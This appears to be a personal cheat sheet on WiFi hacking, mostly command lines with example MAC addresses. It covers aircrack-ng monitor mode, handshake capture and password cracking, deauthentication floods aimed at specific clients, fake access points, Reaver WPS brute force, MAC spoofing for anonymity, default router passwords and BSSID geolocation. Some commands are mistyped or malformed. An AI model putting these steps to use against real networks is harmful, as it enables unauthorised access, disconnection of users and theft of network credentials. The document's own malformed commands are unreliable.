WiFi Hacking

Investigation

Online Tools

• WiGLE

  Wireless Network Mapping. If you have the BSSID, you can get the location.
  You need to create an account to use the advanced search.

Check Status

• Retrieve the Device IP Address

    # IP address
    ip addr
    # IP address - Show the specific interface only
    ip addr show eth0
    ip addr show eth1
    ip addr show tun0

    # IPv4 only
    ip -4 addr
    # IPv6 only
    ip -6 addr

    # Static route
    ip route

• Delete Network Interfaces From Your Devices

    ip link delete docker0

• Find Current WiFi IP Address

  We can get the ip adress of the WiFi that we’re currently connecting by checking a default gateway in results of ipconfig command.

    ipconfig

    # Outputs

    ...

    Default gateway . . . . . : 192.168.1.1

• Find Another Computer's IP Address/MAC Address on Network

    arp -av

• Get Public IP Address

  We can get our public ip address from command line as below.

    curl https://api.ipify.org

Alternatively, we can get the public ip online like https://www.whatismyip.com/.

Crack WiFi Passwords

Default Router Credentials

admin:Admin
admin:admin
admin:password
admin:Michelangelo
root:admin
root:alpine
sitecom:Admin
telco:telco

Crack from A Packet Capture File

If we have a packet capture file (.cap or .pcap) of the WiFi network, we can crack the WiFi password using the file.

aircrack-ng example.cap -w wordlist.txt

Find BSSID From SSID

1. Access to WiGLE and login.
2. Go to View → Advanced Search.
3. Open the General Search tab.
4. Input the SSID in the SSID/Network Name.
5. Check the result.

MAC Address Spoofing

First of all, you need to use network adapter which has monitor mode on your machine.
Aircrack-ng is a complete suite of tools to assess WiFi network security.

1. Preparation

    # Show available interfaces
    airmon-ng

    # Put an interface into monitor mode
    airmon-ng start wlan0
    airmon-ng start eth0
    # or
    iwconfig wlan0 mode monitor
    iwconfig eth0 mode monitor

    # Choose the access point (monitor mode)
    airodump-ng wlan0mon

1. Retrieve Client's MAC Addresses

    # Retrieve client's MAC address from the chosen access point
    # -c 9: channel 9
    # --bssid: target router MAC address
    # -w psk: the dump file prefix
    # eth0: interface name
    airodump-ng -c 6 --bssid XX:XX:XX:XX:XX:XX -i wlan0mon
    airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk eth0

1. Spoof MAC Address using the Retrieved Address

    # Take down the network at first
    ip link set wlan0 down

    # Set MAC address which you got by airodump-ng in the previous section
    macchanger -m XX:XX:XX:XX:XX:XX wlan0

    # Bring up the network
    ip link set wlan0 up

1. Confirmation

    # Check the current MAC address
    macchanger -s wlan0

1. Reset to the Original MAC Address

    # Reset to the original (permanent) MAC address
    macchanger -p wlan0

Other Useful Tools

• Bettercap

  The Swiss Army knife for 802.11, BLE, IPv4 and IPv6 networks reconnaissance and MITM attacks.

• OUI Standards

  List of MAC OUI (Organizationally Unique Identifier). You can get the information from the BSSID.

  • Access to the OUI Standards

    If the target BSSID is "B4:5D:50:AA:86:41", search text by inputting "B4-5D-50" on the string search.
    Then check the information.

[Modes]

Wireless cards coud be in several modes: - Managed - Monitor

[Type of Attacks] - Deauthentication :: Used to disconnect any device from the Ap. - aireplay-ng --deauth [# of packets] -a [AP] [interface]

[Anonimity]

• macchanger
• tor-proxy
• proxychains

[Configure NIC into Monitor Mode]

• iwconfig [interface]
• ifconfig [interface] down
• airmon-ng check [interface]
• airmon-ng start [interface] :: Enable monitor mode
• airmon-ng stop [interface] :: Disable monitor mode
• iwconfig wlan0 mod monitor - ifconfig [interface] up

[Monitoring Wireless Networks]

[Airodump-ng]

sudo airodump-ng [interface] sudo airodump-ng --channel 1 --bssid B2:AB:E4:98:07:09 --write capture/O57 wlan0mon sudo airodump-ng --channel 6 --bssid B2:AB:E4:98:07:09 --write out mon0 sudo airodump-ng --write O57 --output-format csv wlan0mon

[airodump-ng fields]

BSSID :: Mac Address's Victim Access Point (AP) PWR :: Strenght of the signal BEACONS :: DATA :: /s :: CH :: MB :: Max speed supported by the AP. ENC :: Encription used by the AP. :: WEP, WPA, WPA2 Cipher :: Cipher used to encrypt the packet :: WEB, CCMP, TKIP Auth :: Type of authentication :: PSK, MGT ESSID

Station :: Client connected to the AP. Rate :: Lost Frames Probe

[airdrop]

sudo airdrop-ng -t [csv-file] -r [rules-file] -i [interface] sudo airdrop-ng -t file.csv -r airdrop-rules.txt -i mon0

[Deauthentication]

sudo aireplay-ng --deauth [Number of packets] -a [AP] [interface] sudo aireplay-ng --deauth 1000 -a B2:AB:E4:98:07:09 wlan0mon

:: Deauthenticate an specific client ::

• aireplay-ng --deauth [Number of packets] -a [AP] -c [target] [interface] sudo aireplay-ng --deauth 1000 -a B2:AB:E4:98:07:09 -c 0E:8D:B0:10:EE:D9 wlan0mon

[Fake AP]

• airbase-ng -e [network-name] -c [channel] [interface]
• airbase-ng -e fake-ap -c 3 mon0

[WEP]

airodump-ng [interface] airodump-ng -c[CHANNEL] -w[FILE] --bssid[BSSID] wlan0mon aireplay-ng -0 4 -a [MAC] wlan0mon aircrack-ng -w[wordlist] file.cap

[Crunch + Aircrack]

Crunch generates wordlists in both combination and permutation ways

• crunch -t 12 12 %%%%Password 1234567890 | aircrack-ng -w - file.cap -e ESSID_NAME

• crunch 12 12 %%%%Password -f charset.lst mixalpha-numeric-space| aircrack-ng -w - file.cap -e ESSID_NAME

• crunch 12 12 %%%%@@@sword -f charset.lst mixalpha-numeric-space| aircrack-ng -w - file.cap -e ESSID_NAME

• crunch 10 10 -t 123%%%%%%% -o /root/Desktop/areacode123.txt

[Reaver]

• reaver -i wlan0mon -b 00:11:22:33:44:55:66
• reaver -i moninterface -b bssid -vv
• reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv

BSSID PWR BEACONS #DATA #/s CH MB ENC CIPHER AUTH ESSID

[NOTES]

• Crunch: When have some idea of the password.
• 12 12: Password's Lenght.
• %: Insert Numbers (%%%%Password = 1101Password)
• ^:
• ,:

[WEP]

• airmon-ng start wlan0

• airodump-ng --channel[channel] --bssid[bssid] --write[file-name] [interface]

  • airodump-ng --channel 6 --bssid 11:22:33:44:55:66 --write file mon0

• aircrack-ng [file-name]

  • aircrack-ng file.cap

[WPA]

• airodump-ng --chanel[channel] --bssid[bssid] --write[file-name] [interface]

  • airodump-ng --channel 2 --bssid 60:E7:01:07:12:E0 --write capture mon0

• aireplay-ng --deauth[number of deauth packets] -a [AP] -c [target][interface]

  • aireplay-ng --deauth 4 -a 60:E7:01:07:12:E0 -c EC:1F:72:4C:9B:B4 mon0

[LORCON]

lorcon (acronym for Loss Of Radio CONnectivity) is an open source network tool. It is a library for injecting 802.11 (WLAN) frames, capable of injecting via multiple driver frameworks, without the need to change the application code. Lorcon is built by patching the third-party MadWifi-driver for cards based on the Qualcomm Atheros wireless chipset.[1][2][3]

:: Links ::

http://www.elladodelmal.com/2008/08/atacar-wpawpa2-psk-parte-i-de-iv.html